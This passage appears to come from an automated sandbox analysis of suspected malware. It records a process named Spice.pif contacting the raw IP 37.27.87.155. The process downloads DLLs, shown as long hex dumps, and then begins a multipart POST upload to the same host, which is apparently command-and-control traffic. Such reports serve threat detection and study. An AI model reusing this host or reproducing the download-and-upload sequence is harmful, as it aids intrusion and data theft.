                                                                                                                                                                                                                                    Data Ascii: h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
                                                                                                                                                                                                                                    2024-04-30 05:44:21 UTC16384INData Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d
                                                                                                                                                                                                                                    Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
                                                                                                                                                                                                                                    2024-04-30 05:44:21 UTC16384INData Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02
                                                                                                                                                                                                                                    Data Ascii: WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
                                                                                                                                                                                                                                    2024-04-30 05:44:21 UTC16384INData Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9
                                                                                                                                                                                                                                    Data Ascii: D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    14192.168.2.84972337.27.87.155443752C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-04-30 05:44:23 UTC157OUTGET /softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                    Host: 37.27.87.155
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2024-04-30 05:44:23 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 30 Apr 2024 05:44:23 GMT
                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                    Content-Length: 257872
                                                                                                                                                                                                                                    Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    ETag: "6315a9f4-3ef50"
                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    2024-04-30 05:44:23 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                                                                                                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                                                                                                                                                                    2024-04-30 05:44:23 UTC16384INData Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7
                                                                                                                                                                                                                                    Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(^_[]]
                                                                                                                                                                                                                                    2024-04-30 05:44:24 UTC16384INData Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8
                                                                                                                                                                                                                                    Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
                                                                                                                                                                                                                                    2024-04-30 05:44:24 UTC16384INData Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71
                                                                                                                                                                                                                                    Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
                                                                                                                                                                                                                                    2024-04-30 05:44:24 UTC16384INData Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c
                                                                                                                                                                                                                                    Data Ascii: !=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7|
                                                                                                                                                                                                                                    2024-04-30 05:44:24 UTC16384INData Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a
                                                                                                                                                                                                                                    Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
                                                                                                                                                                                                                                    2024-04-30 05:44:24 UTC16384INData Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf
                                                                                                                                                                                                                                    Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZVxM@
                                                                                                                                                                                                                                    2024-04-30 05:44:24 UTC16384INData Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73
                                                                                                                                                                                                                                    Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
                                                                                                                                                                                                                                    2024-04-30 05:44:24 UTC16384INData Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00
                                                                                                                                                                                                                                    Data Ascii: USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|~
                                                                                                                                                                                                                                    2024-04-30 05:44:24 UTC16384INData Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff
                                                                                                                                                                                                                                    Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    15192.168.2.84972437.27.87.155443752C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-04-30 05:44:25 UTC161OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                    Host: 37.27.87.155
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2024-04-30 05:44:25 UTC245INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 30 Apr 2024 05:44:25 GMT
                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                    Content-Length: 80880
                                                                                                                                                                                                                                    Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    ETag: "6315a9f4-13bf0"
                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    2024-04-30 05:44:25 UTC16139INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                                                                                                                                                                    2024-04-30 05:44:25 UTC16384INData Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18
                                                                                                                                                                                                                                    Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
                                                                                                                                                                                                                                    2024-04-30 05:44:26 UTC16384INData Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47
                                                                                                                                                                                                                                    Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
                                                                                                                                                                                                                                    2024-04-30 05:44:26 UTC16384INData Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a
                                                                                                                                                                                                                                    Data Ascii: t@++t+t+u+uQ<0|*<9&w/c5~bASJCtvB
                                                                                                                                                                                                                                    2024-04-30 05:44:26 UTC15589INData Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e
                                                                                                                                                                                                                                    Data Ascii: |5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    16192.168.2.84972537.27.87.155443752C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-04-30 05:44:27 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEH
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                    Host: 37.27.87.155
                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
